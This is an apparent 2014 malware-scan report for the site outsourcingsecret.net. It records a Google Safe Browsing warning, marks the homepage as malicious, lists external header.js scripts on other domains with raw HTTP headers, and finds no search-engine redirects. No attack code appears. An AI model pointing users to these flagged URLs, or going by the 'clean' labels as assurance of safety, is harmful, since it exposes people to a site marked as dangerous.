Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=outsourcingsecret.net
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://outsourcingsecret.net/ | 200 OK Content-Length: 31939 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
http://halehalemusic.com/css/header.js | 500 Can't connect to halehalemusic.com:80 Content-Length: 192 Content-Type: text/plain | clean |
http://halehalemusic.com/test404page.js | 500 Can't connect to halehalemusic.com:80 Content-Length: 192 Content-Type: text/plain | clean |
http://robertwalz.com/header.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Fri, 26 Dec 2014 06:41:28 GMT Pragma: no-cache Location: http://www.robertwalz.com/header.js/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=MW%2Cnj%2CTipU5dGKWbKwN7o3; path=/ X-Pingback: http://www.robertwalz.com/wp/xmlrpc.php | clean |
http://www.robertwalz.com/header.js/ | 200 OK Content-Length: 5422 Content-Type: text/html | clean |
http://www.robertwalz.com/wp/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: application/javascript | clean |
http://www.robertwalz.com/wp/wp-content/plugins/pods/ui/js/pods.ui.js?ver=3.5.1 | 200 OK Content-Length: 590 Content-Type: application/javascript | clean |
http://www.robertwalz.com/wp/wp-content/themes/rw/js/jquery.cycle.min.js?ver=3.5.1 | 200 OK Content-Length: 20004 Content-Type: application/javascript | clean |
http://www.robertwalz.com/wp/wp-includes/js/jquery/jquery.form.min.js?ver=2.73 | 200 OK Content-Length: 11116 Content-Type: application/javascript | clean |
http://www.robertwalz.com/wp/wp-content/plugins/contact-form-7/scripts.js?ver=2.3 | 200 OK Content-Length: 4442 Content-Type: application/javascript | clean |
http://robertwalz.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Fri, 26 Dec 2014 06:41:34 GMT Pragma: no-cache Location: http://www.robertwalz.com/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=3un75w-Tu07XN08ahvPja2; path=/ X-Pingback: http://www.robertwalz.com/wp/xmlrpc.php | clean |
http://www.robertwalz.com/ | 200 OK Content-Length: 5422 Content-Type: text/html | clean |
http://www.robertwalz.com/?page_id=2 | 200 OK Content-Length: 4507 Content-Type: text/html | clean |
http://www.robertwalz.com/?page_id=39 | 200 OK Content-Length: 12435 Content-Type: text/html | clean |
http://www.robertwalz.com/wp/wp-content/uploads/2011/03/DSCN0464_2.jpg | 200 OK Content-Length: 300522 Content-Type: image/jpeg | clean |
http://www.robertwalz.com/wp/wp-content/uploads/2011/03/DSCN6348.jpg | 200 OK Content-Length: 300522 Content-Type: image/jpeg | clean |
http://www.robertwalz.com/wp/wp-content/uploads/2011/03/disassembly.jpg | 200 OK Content-Length: 301698 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: outsourcingsecret.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 06:41:27 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 31939
Content-Type: text/html
Last-Modified: Sun, 25 Mar 2012 00:54:29 GMT
...31939 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: outsourcingsecret.net
Referer: http://www.google.com/search?q=outsourcingsecret.net
Result:
The result is similar to the first query. There are no suspicious redirects found.